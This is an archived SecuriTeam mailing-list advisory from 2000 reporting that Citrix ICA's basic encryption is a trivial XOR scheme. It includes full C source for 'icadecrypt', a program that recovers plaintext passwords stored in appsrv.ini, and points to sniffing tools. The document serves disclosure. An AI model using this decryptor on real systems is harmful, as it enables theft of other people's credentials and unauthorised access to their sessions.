From list-return-509-cascio.vittorio=educ.di.unito.it@securiteam.com Fri Mar 31 22:20:20 2000
Return-Path: <list-return-509-cascio.vittorio=educ.di.unito.it@securiteam.com>
Received: from bagheera by educ.di.unito.it (8.8.8+Sun/SMI-SVR4)
	id WAA15773; Fri, 31 Mar 2000 22:20:20 +0200 (MET DST)
Received: by bagheera (SMI-8.6/SMI-SVR4)
	id WAA09490; Fri, 31 Mar 2000 22:20:06 +0200
Date: Fri, 31 Mar 2000 22:20:06 +0200
Message-Id: <200003312020.WAA09490@bagheera>
Received: from securiteam.com(192.117.232.213) by bagheera via smap (V2.0beta)
	id xma009488; Fri, 31 Mar 00 22:19:46 +0200
Received: (qmail 15650 invoked by uid 500); 31 Mar 2000 20:03:34 -0000
Mailing-List: contact list-help@securiteam.com; run by ezmlm
Precedence: bulk
X-No-Archive: yes
list-help: <mailto:list-help@securiteam.com>
list-unsubscribe: <mailto:list-unsubscribe@securiteam.com>
list-post: <mailto:list@securiteam.com>
Delivered-To: mailing list list@securiteam.com
Delivered-To: moderator for list@securiteam.com
Received: (qmail 7192 invoked from network); 31 Mar 2000 15:47:10 -0000
From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Citrix ICA's basic encryption has been cracked
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Length: 4214
Status: R

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com


          Citrix ICA's basic encryption has been cracked
--------------------------------------------------------------------------------


SUMMARY

The ICA (Independent Computing Architecture) protocol used in various 
Citrix products (Winframe, Metaframe) relies on a trivial encryption 
scheme to protect user authentication. This algorithm can be easily 
cracked, and allows attackers to sniff passwords and watch the traffic 
between the Citrix client and server, as well as perform more advanced 
attacks such as a man-in-the-middle attack or even a session hijacking.

DETAILS

The ICA basic encryption algorithm is a variant of the simple XOR scheme 
used for saved Winframe passwords:

void decrypt(u_char key, u_char *p, int len)
{
  int i;

  for (i = len; i > 0; i--)
    p[i] = p[i-1] ^ p[i] ^ key;

  p[0] ^= (key | 'C');
}

Exploit:
The following will decrypt stored Citrix ICA passwords (in appsrv.ini).
/*
  icadecrypt.c

  Dug Song <dugsong@monkey.org>
*/

#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

int
hex_decode(char *src, u_char *dst, int outsize)
{
  char *p, *pe;
  u_char *q, *qe, ch, cl;
  
  pe = src + strlen(src);
  qe = dst + outsize;

  for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) {
    ch = tolower(p[0]);
    cl = tolower(p[1]);
    
    if ((ch >= '0') && (ch <= '9')) ch -= '0';
    else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
    else return (-1);
    
    if ((cl >= '0') && (cl <= '9')) cl -= '0';
    else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
    else return (-1);
    
    *q++ = (ch << 4) | cl;
  }
  return (q - dst);
}

int
ica_decrypt(u_char *pass, int len)
{
  u_short i;
  u_char *p, key;

  if (len < 4)
    return (0);

  i = ntohs(*(u_short *)pass);
  
  if (i != len - 2)
    return (0);
  
  key = pass[2];
  p = pass + 3;
  
  for (i -= 2; i > 0; i--)
    p[i] = p[i - 1] ^ p[i] ^ key;

  p[0] ^= (key | 'C');
  
  i = len - 3;
  memmove(pass, pass + 3, i);
  pass[i] = '\0';
  
  return (1);
}

void
usage(void)
{
  fprintf(stderr, "Usage: icadecrypt <file>\n");
  exit(1);
}

int
main(int argc, char *argv[])
{
  FILE *f;
  u_char line[1024], pass[128];
  int len;

  if (argc != 2 || *argv[1] == '-')
    usage();

  if ((f = fopen(argv[1], "r")) == NULL) {
    perror("fopen");
    exit(1);
  }
  while (fgets(line, sizeof(line), f) != NULL) {
    if (strncmp(line, "Password=", 9) == 0) {
      len = hex_decode(line + 9, pass, sizeof(pass));
      if (ica_decrypt(pass, len))
        printf("; icadecrypt: [%s]\n", pass);
    }
    printf("%s", line);
  }
  fclose(f);

  exit(0);
}

/* 5000. */
----------------

Demonstration code to sniff (and decrypt) ICA network authentication is 
available at:
 <http://www.monkey.org/~dugsong/dsniff/> 
http://www.monkey.org/~dugsong/dsniff/

Citrix offers a secure alternative called SecureICA, which uses 
Diffie-Hellman for key exchange and RC5 to encrypt the underlying 
transport (now at 128-bit strength worldwide). While this is certainly 
better than the simple XOR scheme outlined above, it may still be 
vulnerable to an active man-in-the-middle attack. Caveat user.

 <http://www.citrix.com/products/sica/> 
http://www.citrix.com/products/sica/
(NOTE: The SecureICA supported client is only available for Windows)


ADDITIONAL INFORMATION

The information was provided by:  <mailto:dugsong@MONKEY.ORG> Dug Song.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. 






